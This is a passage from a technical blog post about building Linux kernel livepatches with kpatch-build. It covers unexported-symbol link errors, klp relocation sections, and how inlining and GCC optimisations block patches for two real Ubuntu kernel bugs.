<span class="p">{</span>
<span class="p">.</span><span class="n">old_name</span> <span class="o">=</span> <span class="s">"meminfo_proc_show"</span><span class="p">,</span>
<span class="p">.</span><span class="n">new_func</span> <span class="o">=</span> <span class="n">livepatch_meminfo_proc_show</span><span class="p">,</span>
<span class="p">},</span> <span class="p">{</span> <span class="p">}</span>
<span class="p">};</span>
<span class="k">static</span> <span class="k">struct</span> <span class="n">klp_object</span> <span class="n">objs</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span>
<span class="p">{</span>
<span class="cm">/* name being NULL means vmlinux */</span>
<span class="p">.</span><span class="n">funcs</span> <span class="o">=</span> <span class="n">funcs</span><span class="p">,</span>
<span class="p">},</span> <span class="p">{</span> <span class="p">}</span>
<span class="p">};</span>
<span class="k">static</span> <span class="k">struct</span> <span class="n">klp_patch</span> <span class="n">patch</span> <span class="o">=</span> <span class="p">{</span>
<span class="p">.</span><span class="n">mod</span> <span class="o">=</span> <span class="n">THIS_MODULE</span><span class="p">,</span>
<span class="p">.</span><span class="n">objs</span> <span class="o">=</span> <span class="n">objs</span><span class="p">,</span>
<span class="p">};</span>
<span class="k">static</span> <span class="kt">int</span> <span class="nf">livepatch_init</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="n">klp_enable_patch</span><span class="p">(</span><span class="o">&</span><span class="n">patch</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">static</span> <span class="kt">void</span> <span class="nf">livepatch_exit</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
<span class="p">}</span>
<span class="n">module_init</span><span class="p">(</span><span class="n">livepatch_init</span><span class="p">);</span>
<span class="n">module_exit</span><span class="p">(</span><span class="n">livepatch_exit</span><span class="p">);</span>
<span class="n">MODULE_LICENSE</span><span class="p">(</span><span class="s">"GPL"</span><span class="p">);</span>
<span class="n">MODULE_INFO</span><span class="p">(</span><span class="n">livepatch</span><span class="p">,</span> <span class="s">"Y"</span><span class="p">);</span>
</code></pre></div></div>
<p>We can pretty much keep the same <code class="language-plaintext highlighter-rouge">Makefile</code> as last time:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>obj-m := livepatch-meminfo.o
KDIR := /lib/modules/$(shell uname -r)/build
PWD := $(shell pwd)
default:
	$(MAKE) -C $(KDIR) M=$(PWD) modules
clean:
	$(MAKE) -C $(KDIR) M=$(PWD) clean
</code></pre></div></div>
<p>When we build, we see some unresolved symbols:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>make
make <span class="nt">-C</span> /lib/modules/5.4.0-21-generic/build <span class="nv">M</span><span class="o">=</span>/home/ubuntu/meminfo modules
make[1]: Entering directory <span class="s1">'/usr/src/linux-headers-5.4.0-21-generic'</span>
CC <span class="o">[</span>M] /home/ubuntu/meminfo/livepatch-meminfo.o
/home/ubuntu/meminfo/livepatch-meminfo.c: In <span class="k">function</span> ‘livepatch_meminfo_proc_show’:
/home/ubuntu/meminfo/livepatch-meminfo.c:19:9: error: implicit declaration of <span class="k">function</span> ‘si_swapinfo’ <span class="o">[</span><span class="nt">-Werror</span><span class="o">=</span>implicit-function-declaration]
19 | si_swapinfo<span class="o">(</span>&i<span class="o">)</span><span class="p">;</span>
| ^~~~~~~~~~~
/home/ubuntu/meminfo/livepatch-meminfo.c:20:51: error: ‘vm_committed_as’ undeclared <span class="o">(</span>first use <span class="k">in </span>this <span class="k">function</span><span class="o">)</span>
20 | committed <span class="o">=</span> percpu_counter_read_positive<span class="o">(</span>&vm_committed_as<span class="o">)</span><span class="p">;</span>
| ^~~~~~~~~~~~~~~
/home/ubuntu/meminfo/livepatch-meminfo.c:20:51: note: each undeclared identifier is reported only once <span class="k">for </span>each <span class="k">function </span>it appears <span class="k">in</span>
/home/ubuntu/meminfo/livepatch-meminfo.c:23:25: error: implicit declaration of <span class="k">function</span> ‘total_swapcache_pages’ <span class="o">[</span><span class="nt">-Werror</span><span class="o">=</span>implicit-function-declaration]
23 | total_swapcache_pages<span class="o">()</span> - i.bufferram<span class="p">;</span>
| ^~~~~~~~~~~~~~~~~~~~~
/home/ubuntu/meminfo/livepatch-meminfo.c:34:9: error: implicit declaration of <span class="k">function</span> ‘show_val_kb’ <span class="o">[</span><span class="nt">-Werror</span><span class="o">=</span>implicit-function-declaration]
34 | show_val_kb<span class="o">(</span>m, <span class="s2">"MemTotal: "</span>, i.totalram<span class="o">)</span><span class="p">;</span>
| ^~~~~~~~~~~
/home/ubuntu/meminfo/livepatch-meminfo.c:90:44: error: implicit declaration of <span class="k">function</span> ‘vm_commit_limit’ <span class="o">[</span><span class="nt">-Werror</span><span class="o">=</span>implicit-function-declaration]
90 | show_val_kb<span class="o">(</span>m, <span class="s2">"CommitLimit: "</span>, vm_commit_limit<span class="o">())</span><span class="p">;</span>
| ^~~~~~~~~~~~~~~
/home/ubuntu/meminfo/livepatch-meminfo.c:117:44: error: ‘totalcma_pages’ undeclared <span class="o">(</span>first use <span class="k">in </span>this <span class="k">function</span><span class="o">)</span><span class="p">;</span> did you mean ‘totalram_pages’?
117 | show_val_kb<span class="o">(</span>m, <span class="s2">"CmaTotal: "</span>, totalcma_pages<span class="o">)</span><span class="p">;</span>
| ^~~~~~~~~~~~~~
| totalram_pages
/home/ubuntu/meminfo/livepatch-meminfo.c:122:9: error: implicit declaration of <span class="k">function</span> ‘hugetlb_report_meminfo’<span class="p">;</span> did you mean ‘arch_report_meminfo’? <span class="o">[</span><span class="nt">-Werror</span><span class="o">=</span>implicit-function-declaration]
122 | hugetlb_report_meminfo<span class="o">(</span>m<span class="o">)</span><span class="p">;</span>
| ^~~~~~~~~~~~~~~~~~~~~~
| arch_report_meminfo
cc1: some warnings being treated as errors
make[2]: <span class="k">***</span> <span class="o">[</span>scripts/Makefile.build:275: /home/ubuntu/meminfo/livepatch-meminfo.o] Error 1
make[1]: <span class="k">***</span> <span class="o">[</span>Makefile:1719: /home/ubuntu/meminfo] Error 2
make[1]: Leaving directory <span class="s1">'/usr/src/linux-headers-5.4.0-21-generic'</span>
make: <span class="k">***</span> <span class="o">[</span>Makefile:5: default] Error 2
</code></pre></div></div>
<p>Not to worry! We are just missing some header files. Look at the symbols and use
cscope to find what header files they live in, and <code class="language-plaintext highlighter-rouge">#include</code> them:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include <linux/seq_file.h>
#include <linux/swap.h>
#include <linux/mman.h>
#include <linux/cma.h>
#include <linux/hugetlb.h>
</span></code></pre></div></div>
<p>Now lets build:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>make
make <span class="nt">-C</span> /lib/modules/5.4.0-21-generic/build <span class="nv">M</span><span class="o">=</span>/home/ubuntu/meminfo modules
make[1]: Entering directory <span class="s1">'/usr/src/linux-headers-5.4.0-21-generic'</span>
CC <span class="o">[</span>M] /home/ubuntu/meminfo/livepatch-meminfo.o
/home/ubuntu/meminfo/livepatch-meminfo.c: In <span class="k">function</span> ‘livepatch_meminfo_proc_show’:
/home/ubuntu/meminfo/livepatch-meminfo.c:38:9: error: implicit declaration of <span class="k">function</span> ‘show_val_kb’ <span class="o">[</span><span class="nt">-Werror</span><span class="o">=</span>implicit-function-declaration]
38 | show_val_kb<span class="o">(</span>m, <span class="s2">"MemTotal: "</span>, i.totalram<span class="o">)</span><span class="p">;</span>
| ^~~~~~~~~~~
cc1: some warnings being treated as errors
make[2]: <span class="k">***</span> <span class="o">[</span>scripts/Makefile.build:275: /home/ubuntu/meminfo/livepatch-meminfo.o] Error 1
make[1]: <span class="k">***</span> <span class="o">[</span>Makefile:1719: /home/ubuntu/meminfo] Error 2
make[1]: Leaving directory <span class="s1">'/usr/src/linux-headers-5.4.0-21-generic'</span>
make: <span class="k">***</span> <span class="o">[</span>Makefile:5: default] Error 2
</code></pre></div></div>
<p>Unfortunately for us, this basic example calls <code class="language-plaintext highlighter-rouge">show_val_kb()</code>. This isn’t
defined in any header files, and is actually local to <code class="language-plaintext highlighter-rouge">fs/proc/meminfo.c</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">void</span> <span class="nf">show_val_kb</span><span class="p">(</span><span class="k">struct</span> <span class="n">seq_file</span> <span class="o">*</span><span class="n">m</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">s</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">num</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">seq_put_decimal_ull_width</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="n">s</span><span class="p">,</span> <span class="n">num</span> <span class="o"><<</span> <span class="p">(</span><span class="n">PAGE_SHIFT</span> <span class="o">-</span> <span class="mi">10</span><span class="p">),</span> <span class="mi">8</span><span class="p">);</span>
<span class="n">seq_write</span><span class="p">(</span><span class="n">m</span><span class="p">,</span> <span class="s">" kB</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>So close, yet so far! These functions are local to their source files and don’t
actually export their symbols, which means we have a problem. Even if we
try to be cheeky and make a forward declaration and label it
<code class="language-plaintext highlighter-rouge">extern</code>:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">extern</span> <span class="kt">void</span> <span class="nf">show_val_kb</span><span class="p">(</span><span class="k">struct</span> <span class="n">seq_file</span> <span class="o">*</span><span class="n">m</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">s</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">num</span><span class="p">);</span>
</code></pre></div></div>
<p>The compiler is onto us!</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>make
make <span class="nt">-C</span> /lib/modules/5.4.0-21-generic/build <span class="nv">M</span><span class="o">=</span>/home/ubuntu/meminfo modules
make[1]: Entering directory <span class="s1">'/usr/src/linux-headers-5.4.0-21-generic'</span>
CC <span class="o">[</span>M] /home/ubuntu/meminfo/livepatch-meminfo.o
Building modules, stage 2.
MODPOST 1 modules
ERROR: <span class="s2">"arch_report_meminfo"</span> <span class="o">[</span>/home/ubuntu/meminfo/livepatch-meminfo.ko] undefined!
ERROR: <span class="s2">"hugetlb_report_meminfo"</span> <span class="o">[</span>/home/ubuntu/meminfo/livepatch-meminfo.ko] undefined!
ERROR: <span class="s2">"totalcma_pages"</span> <span class="o">[</span>/home/ubuntu/meminfo/livepatch-meminfo.ko] undefined!
ERROR: <span class="s2">"num_poisoned_pages"</span> <span class="o">[</span>/home/ubuntu/meminfo/livepatch-meminfo.ko] undefined!
ERROR: <span class="s2">"pcpu_nr_pages"</span> <span class="o">[</span>/home/ubuntu/meminfo/livepatch-meminfo.ko] undefined!
ERROR: <span class="s2">"vmalloc_nr_pages"</span> <span class="o">[</span>/home/ubuntu/meminfo/livepatch-meminfo.ko] undefined!
ERROR: <span class="s2">"vm_commit_limit"</span> <span class="o">[</span>/home/ubuntu/meminfo/livepatch-meminfo.ko] undefined!
ERROR: <span class="s2">"show_val_kb"</span> <span class="o">[</span>/home/ubuntu/meminfo/livepatch-meminfo.ko] undefined!
ERROR: <span class="s2">"total_swapcache_pages"</span> <span class="o">[</span>/home/ubuntu/meminfo/livepatch-meminfo.ko] undefined!
ERROR: <span class="s2">"vm_committed_as"</span> <span class="o">[</span>/home/ubuntu/meminfo/livepatch-meminfo.ko] undefined!
ERROR: <span class="s2">"si_swapinfo"</span> <span class="o">[</span>/home/ubuntu/meminfo/livepatch-meminfo.ko] undefined!
make[2]: <span class="k">***</span> <span class="o">[</span>scripts/Makefile.modpost:94: __modpost] Error 1
make[1]: <span class="k">***</span> <span class="o">[</span>Makefile:1632: modules] Error 2
make[1]: Leaving directory <span class="s1">'/usr/src/linux-headers-5.4.0-21-generic'</span>
make: <span class="k">***</span> <span class="o">[</span>Makefile:5: default] Error 2
</code></pre></div></div>
<p>While the module object compiles, it cannot be linked, since the module build has
no way of resolving the addresses of these functions, which reside only in the
unstripped vmlinux / stripped vmlinuz binaries.</p>
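<p>Note that the symbols themselves do exist at runtime; they are simply not exported
for modules to link against. A rough sanity check (nothing more) is to look them up
in kallsyms, where a lowercase <code class="language-plaintext highlighter-rouge">t</code> marks a local text symbol:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo grep -w show_val_kb /proc/kallsyms
# a matching line of type 't' confirms the symbol exists, but is local
</code></pre></div></div>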
<p>So, how do we fix this? I struggled with this issue for quite a long time, until
I went back and read the Livepatch documentation more closely.</p>
<p>From <a href="https://www.kernel.org/doc/Documentation/livepatch/livepatch.txt">Documentation/livepatch/livepatch.txt</a>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>The patch contains only functions that are really modified. But they
might want to access functions or data from the original source file
that may only be locally accessible. This can be solved by a special
relocation section in the generated livepatch module, see
Documentation/livepatch/module-elf-format.txt for more details.
</code></pre></div></div>
<p>If you go ahead and read <a href="https://www.kernel.org/doc/Documentation/livepatch/module-elf-format.txt">Documentation/livepatch/module-elf-format.txt</a>,
we find that we need to add ELF sections to the object file which tell the
kernel Livepatch subsystem how to apply relocations for each of these functions
into the kernel we are targeting.</p>
<p>There are two special ELF markers involved:</p>
<ul>
<li>SHF_RELA_LIVEPATCH</li>
<li>SHN_LIVEPATCH</li>
</ul>
<p>SHF_RELA_LIVEPATCH is a section flag which marks a relocation section as one that
the kernel Livepatch core must apply itself when the patch is applied to the
target object, rather than having the regular module loader process it at load
time.</p>
<p>SHN_LIVEPATCH is a special symbol section index which marks the unexported local
symbols that the fixed function calls; the kernel resolves their addresses when
the patch module is loaded.</p>
<p>Each relocation section is named with the form:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.klp.rela.objname.section_name
</code></pre></div></div>
<p>An example of such a relocation section for our meminfo patch would be:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.klp.rela.vmlinux..text.meminfo_proc_show
</code></pre></div></div>
<p>These ELF sections need to know the addresses and offsets from the vmlinux
binary.</p>
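<p>The livepatch symbols themselves follow a naming pattern too, documented in
module-elf-format.txt as <code class="language-plaintext highlighter-rouge">.klp.sym.objname.symbol_name,sympos</code>,
where sympos disambiguates between duplicate symbol names (0 if the symbol is
unique). The relocations in the readelf output later in this post reference
symbols of exactly this shape, for example:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.klp.sym.vmlinux.si_swapinfo,0
</code></pre></div></div>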
<p>Now, inserting these by hand is actually really hard, and does not scale at all.</p>
<p>This is the idea behind <code class="language-plaintext highlighter-rouge">kpatch-build</code>, an automated build program which can
generate Livepatches from source diffs, and programmatically generate and insert
these ELF sections which contain the symbol relocation tables.</p>
<h3 id="using-kpatch-build-to-generate-the-livepatch">Using kpatch-build to Generate the Livepatch</h3>
<p>Firstly we need to download and build kpatch-build:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo apt install dpkg-dev devscripts elfutils ccache
$ sudo apt build-dep linux
$ git clone https://github.com/dynup/kpatch.git
$ cd kpatch
$ make
</code></pre></div></div>
<p>The next step is to download the <code class="language-plaintext highlighter-rouge">ddeb</code> (debug-deb) package for the kernel we
wish to make a Livepatch module for. A list of all kernel ddeb packages can
be found <a href="http://ddebs.ubuntu.com/ubuntu/pool/main/l/linux/">at the ddeb package repository</a>.</p>
<p>I will be targeting 5.4.0-24-generic, so I need to download
<a href="http://ddebs.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-unsigned-5.4.0-24-generic-dbgsym_5.4.0-24.28_amd64.ddeb">linux-image-unsigned-5.4.0-24-generic-dbgsym_5.4.0-24.28_amd64.ddeb</a>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ wget http://ddebs.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-unsigned-5.4.0-24-generic-dbgsym_5.4.0-24.28_amd64.ddeb
$ sudo dpkg -i linux-image-unsigned-5.4.0-24-generic-dbgsym_5.4.0-24.28_amd64.ddeb
</code></pre></div></div>
<p>The resulting debug vmlinux will be placed at <code class="language-plaintext highlighter-rouge">/lib/debug/boot/vmlinux-5.4.0-24-generic</code>.</p>
<p><code class="language-plaintext highlighter-rouge">kpatch-build</code> operates on source diffs. Save the diff to <code class="language-plaintext highlighter-rouge">~/meminfo-string.patch</code>
like so:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ cat ~/meminfo-string.patch
diff --git a/fs/proc/meminfo.c b/fs/proc/meminfo.c
index 8c1f1bb1a5ce..3053c1bce50d 100644
--- a/fs/proc/meminfo.c
+++ b/fs/proc/meminfo.c
@@ -117,7 +117,7 @@ static int meminfo_proc_show(struct seq_file *m, void *v)
seq_printf(m, "VmallocTotal: %8lu kB\n",
(unsigned long)VMALLOC_TOTAL >> 10);
show_val_kb(m, "VmallocUsed: ", vmalloc_nr_pages());
- show_val_kb(m, "VmallocChunk: ", 0ul);
+ show_val_kb(m, "VMALLOCCHUNK: ", 0ul);
show_val_kb(m, "Percpu: ", pcpu_nr_pages());
#ifdef CONFIG_MEMORY_FAILURE
</code></pre></div></div>
<p>Now we are ready to build!</p>
<p>Run the following command:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ kpatch/kpatch-build/kpatch-build -t vmlinux --vmlinux /lib/debug/boot/vmlinux-5.4.0-24-generic ~/meminfo-string.patch
Using cache at /home/matthew/.kpatch/src
Testing patch file(s)
Reading special section data
readelf: Error: LEB value too large
readelf: Error: LEB value too large
Building original source
Building patched source
Extracting new and modified ELF sections
meminfo.o: changed function: meminfo_proc_show
Patched objects: vmlinux
Building patch module: livepatch-meminfo-string.ko
SUCCESS
</code></pre></div></div>
<p><code class="language-plaintext highlighter-rouge">kpatch-build</code> works by first downloading the source archive of the kernel you
are targeting, which is determined from the vmlinux binary you pass in.
From there, the standard vmlinux is built normally. Once that completes, the
source tree is patched with the patch you specified, and rebuilt. Since most
patches are small, only changed object files are rebuilt. In this case, only
<code class="language-plaintext highlighter-rouge">meminfo.o</code> gets rebuilt.</p>
<p>Since we now know that only <code class="language-plaintext highlighter-rouge">meminfo.o</code> got changed, the single object is
compiled again with <code class="language-plaintext highlighter-rouge">-ffunction-sections -fdata-sections</code> in both the patched
and unpatched forms.</p>
<p>Each unpatched and patched object pair is then analysed by
<code class="language-plaintext highlighter-rouge">create-diff-object</code> to determine which functions have been modified, and to
extract the changed functions. This program also checks for Livepatch compatibility.</p>
<p>The really special part of <code class="language-plaintext highlighter-rouge">create-diff-object</code> is that it adds the necessary
ELF symbol relocation sections to the patched object file.</p>
<p>It adds <code class="language-plaintext highlighter-rouge">.kpatch.funcs</code> and <code class="language-plaintext highlighter-rouge">.rela.kpatch.funcs</code>, which tell ftrace what functions
are actually going to be Livepatched.</p>
<p>It adds <code class="language-plaintext highlighter-rouge">.kpatch.dynrelas</code> and <code class="language-plaintext highlighter-rouge">.rela.kpatch.dynrelas</code> which are used to fixup
symbol relocations for local function calls in the fixed function to symbols
in vmlinux.</p>
<p>From there, <code class="language-plaintext highlighter-rouge">kpatch-build</code> generates a new kernel module containing all
Livepatches, which is ready to be used.</p>
<p>Let’s test it out shall we?</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo insmod livepatch-meminfo-string.ko
$ grep -i chunk /proc/meminfo
VMALLOCCHUNK: 0 kB
</code></pre></div></div>
<p>It worked! Great! Let’s see what <code class="language-plaintext highlighter-rouge">dmesg</code> has to say:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[ 5611.674220] livepatch_meminfo_string: loading out-of-tree module taints kernel.
[ 5611.674223] livepatch_meminfo_string: tainting kernel with TAINT_LIVEPATCH
[ 5611.674259] livepatch_meminfo_string: module verification failed: signature and/or required key missing - tainting kernel
[ 5611.856109] livepatch: enabling patch 'livepatch_meminfo_string'
[ 5611.859603] livepatch: 'livepatch_meminfo_string': starting patching transition
[ 5611.860277] livepatch: 'livepatch_meminfo_string': patching complete
</code></pre></div></div>
<p>Pretty much the same as last time.</p>
<p>As for those ELF sections, we can examine the kernel module to see them:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ readelf --sections livepatch-meminfo-string.ko
There are 52 section headers, starting at offset 0xac7e8:
Section Headers:
[Nr] Name Type Address Offset
Size EntSize Flags Link Info Align
...
[20] .kpatch.funcs PROGBITS 0000000000000000 00001fa8
0000000000000038 0000000000000000 A 0 0 8
[21] .rela.kpatch.func RELA 0000000000000000 00001fe0
0000000000000048 0000000000000018 I 48 20 8
...
[51] .klp.rela.vmlinux RELA 0000000000000000 000ac308
00000000000004e0 0000000000000018 AIo 48 10 8
</code></pre></div></div>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ readelf --relocs livepatch-meminfo-string.ko
...
Relocation section '.klp.rela.vmlinux..text.meminfo_proc_show' at offset 0xac308 contains 52 entries:
Offset Info Type Sym. Value Sym. Name + Addend
00000000003f 005400000004 R_X86_64_PLT32 0000000000000000 .klp.sym.vmlinux.si_sw - 4
000000000046 005500000002 R_X86_64_PC32 0000000000000000 .klp.sym.vmlinux.vm_co + 4
...
</code></pre></div></div>
<h1 id="using-livepatch-to-fix-a-real-bug">Using Livepatch to Fix A Real Bug</h1>
<p>Now, I really wanted to make a Livepatch to fix a real bug, but for the moment
I must admit defeat.</p>
<p>I went into writing this blog post thinking that Livepatch could be an awesome
tool to help fix customer issues, but the problem is, there are some severe
limitations as to what can be Livepatched, and even when you believe a patch
could be compatible, a GCC optimisation could completely ruin your plans.</p>
<p>I have two examples.</p>
<h2 id="example-one-inline-functions">Example One: Inline Functions</h2>
<p>The first is a bug that was actually a regression in the SRU I made for the
bug fixed in my previous blog post,
<a href="https://ruffell.nz/programming/writeups/2019/07/20/resolving-nvme-performance-degradation.html">Resolving Large NVMe Performance Degradation in the Ubuntu 4.4 Kernel</a>.</p>
<p>Anyway, the bug is documented by the colleague I worked the case with:</p>
<p><a href="https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1869229">Mounting LVM snapshots with xfs can hit kernel BUG in nvme driver</a>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>commit 5a8d75a1b8c99bdc926ba69b7b7dbe4fae81a5af
Author: Ming Lei <ming.lei@redhat.com>
Date: Fri Apr 14 13:58:29 2017 -0600
Subject: block: fix bio_will_gap() for first bvec with offset
</code></pre></div></div>
<p>You can read the commit here:
<a href="https://github.com/torvalds/linux/commit/5a8d75a1b8c99bdc926ba69b7b7dbe4fae81a5af">block: fix bio_will_gap() for first bvec with offset</a>.</p>
<p>The important part is the prototypes of the three functions involved:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>-static inline bool bio_will_gap(struct request_queue *q, struct bio *prev,
- struct bio *next)
+static inline bool bio_will_gap(struct request_queue *q,
+ struct request *prev_rq,
+ struct bio *prev,
+ struct bio *next)
static inline bool req_gap_back_merge(struct request *req, struct bio *bio)
static inline bool req_gap_front_merge(struct request *req, struct bio *bio)
</code></pre></div></div>
<p>Inlined functions. Sometimes these will work, as the callers will just embed
the code in them. Most of the time they won’t though.</p>
<p>The thing is, the kernel redefines the meaning of <code class="language-plaintext highlighter-rouge">inline</code> in
<code class="language-plaintext highlighter-rouge">include/linux/compiler_types.h</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#if !defined(CONFIG_OPTIMIZE_INLINING)
#define inline inline __attribute__((__always_inline__)) __gnu_inline \
__inline_maybe_unused notrace
#else
#define inline inline __gnu_inline \
__inline_maybe_unused notrace
#endif
</code></pre></div></div>
<p>We see that if you select <code class="language-plaintext highlighter-rouge">inline</code>, you also get <code class="language-plaintext highlighter-rouge">notrace</code>. As we know, only traceable
functions can be Livepatched, meaning that this is a dead end if you are not
using tools like <code class="language-plaintext highlighter-rouge">kpatch-build</code>, and most patches like this will error out with
<code class="language-plaintext highlighter-rouge">kpatch-build</code> too.</p>
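<p>Before investing time in a patch, a rough check is to see whether the target
function is even visible to ftrace. This assumes debugfs is mounted in the usual
location; a function missing from this list cannot be Livepatched:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sudo grep -w meminfo_proc_show /sys/kernel/debug/tracing/available_filter_functions
meminfo_proc_show
$ sudo grep -w bio_will_gap /sys/kernel/debug/tracing/available_filter_functions
# no output: bio_will_gap was inlined and marked notrace, so ftrace cannot see it
</code></pre></div></div>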
<h2 id="example-two-gcc-optimisations">Example Two: GCC Optimisations</h2>
<p>The next bug is a neat little NULL pointer dereference triggered if you have the sysctl
<code class="language-plaintext highlighter-rouge">kernel.core_pattern</code> set to “|” and run a program which crashes.</p>
<p>You can read all about it here:</p>
<p><a href="https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1863086">unkillable process (kernel NULL pointer dereference)</a></p>
<p>There’s a patch made by Sudip Mukherjee, more elegant than the one I put
forward, which is in the process of being mainlined now. You can see it here:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>diff --git a/fs/coredump.c b/fs/coredump.c
index f8296a82d01d..408418e6aa13 100644
--- a/fs/coredump.c
+++ b/fs/coredump.c
@@ -211,6 +211,8 @@ static int format_corename(struct core_name *cn, struct coredump_params *cprm,
return -ENOMEM;
(*argv)[(*argc)++] = 0;
++pat_ptr;
+ if (!(*pat_ptr))
+ return -ENOMEM;
}
/* Repeat as long as we have more pattern to process and more output
</code></pre></div></div>
<p>Now, if we run <code class="language-plaintext highlighter-rouge">kpatch-build</code> over this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ kpatch/kpatch-build/kpatch-build -t vmlinux --vmlinux /lib/debug/boot/vmlinux-5.4.0-24-generic ~/corename.patch
Using cache at /home/matthew/.kpatch/src
Testing patch file(s)
Reading special section data
readelf: Error: LEB value too large
readelf: Error: LEB value too large
Building original source
Building patched source
Extracting new and modified ELF sections
coredump.o: changed function: do_coredump
/home/matthew/work/kernel/kpatch/kpatch-build/create-diff-object: ERROR: coredump.o: find_local_syms: 175: find_local_syms for coredump.c: couldn't find in vmlinux symbol table
ERROR: 1 error(s) encountered. Check /home/matthew/.kpatch/build.log for more details.
</code></pre></div></div>
<p>It fails! Why does it say the changed function was <code class="language-plaintext highlighter-rouge">do_coredump()</code>, when the
above patch clearly patches <code class="language-plaintext highlighter-rouge">format_corename()</code>? There are no inlined functions
here.</p>
<p>To get some answers, we need to look at the vmlinux binaries to see what
symbols are present in each.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ readelf -s /lib/debug/boot/vmlinux-5.4.0-24-generic
...
29993: 0000000000000000 0 FILE LOCAL DEFAULT ABS coredump.c
29994: ffffffff8247f938 0 NOTYPE LOCAL DEFAULT 13 __ksymtab_dump_emit
29995: ffffffff824a80eb 10 OBJECT LOCAL DEFAULT 17 __kstrtab_dump_emit
29996: ffffffff8247f95c 0 NOTYPE LOCAL DEFAULT 13 __ksymtab_dump_skip
29997: ffffffff824a80e1 10 OBJECT LOCAL DEFAULT 17 __kstrtab_dump_skip
29998: ffffffff8247f92c 0 NOTYPE LOCAL DEFAULT 13 __ksymtab_dump_align
29999: ffffffff824a80d6 11 OBJECT LOCAL DEFAULT 17 __kstrtab_dump_align
30000: ffffffff8247f974 0 NOTYPE LOCAL DEFAULT 13 __ksymtab_dump_truncate
30001: ffffffff824a80c8 14 OBJECT LOCAL DEFAULT 17 __kstrtab_dump_truncate
30002: ffffffff813610b0 156 FUNC LOCAL DEFAULT 1 umh_pipe_setup
30003: ffffffff81361150 208 FUNC LOCAL DEFAULT 1 zap_process
30004: ffffffff813612e0 100 FUNC LOCAL DEFAULT 1 expand_corename.isra.0
30005: ffffffff827144c0 4 OBJECT LOCAL DEFAULT 24 core_name_size
30006: ffffffff81361350 195 FUNC LOCAL DEFAULT 1 cn_vprintf
30007: ffffffff81361420 106 FUNC LOCAL DEFAULT 1 cn_printf
30008: ffffffff81361490 247 FUNC LOCAL DEFAULT 1 cn_esc_printf
30009: ffffffff82d3f560 4096 OBJECT LOCAL DEFAULT 54 zeroes.62762
30010: ffffffff81361660 1383 FUNC LOCAL DEFAULT 1 format_corename.isra.0
30011: ffffffff81361bd0 36 FUNC LOCAL DEFAULT 1 kmalloc_array.constprop.0
30012: ffffffff82d40560 0 OBJECT LOCAL DEFAULT 54 __key.10435
30013: ffffffff82d40560 4 OBJECT LOCAL DEFAULT 54 core_dump_count.62719
30014: ffffffff81362730 56 FUNC LOCAL DEFAULT 1 do_coredump.cold
30015: ffffffff82079530 12 OBJECT LOCAL DEFAULT 7 __func__.62732
...
</code></pre></div></div>
<p>Next, the freshly built vmlinux:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ readelf -s ~/.kpatch/src/vmlinux
...
92711: 0000000000000000 0 FILE LOCAL DEFAULT ABS coredump.c
92712: ffffffff8248f918 0 NOTYPE LOCAL DEFAULT 97899 __ksymtab_dump_emit
92713: ffffffff824b80cb 10 OBJECT LOCAL DEFAULT 97903 __kstrtab_dump_emit
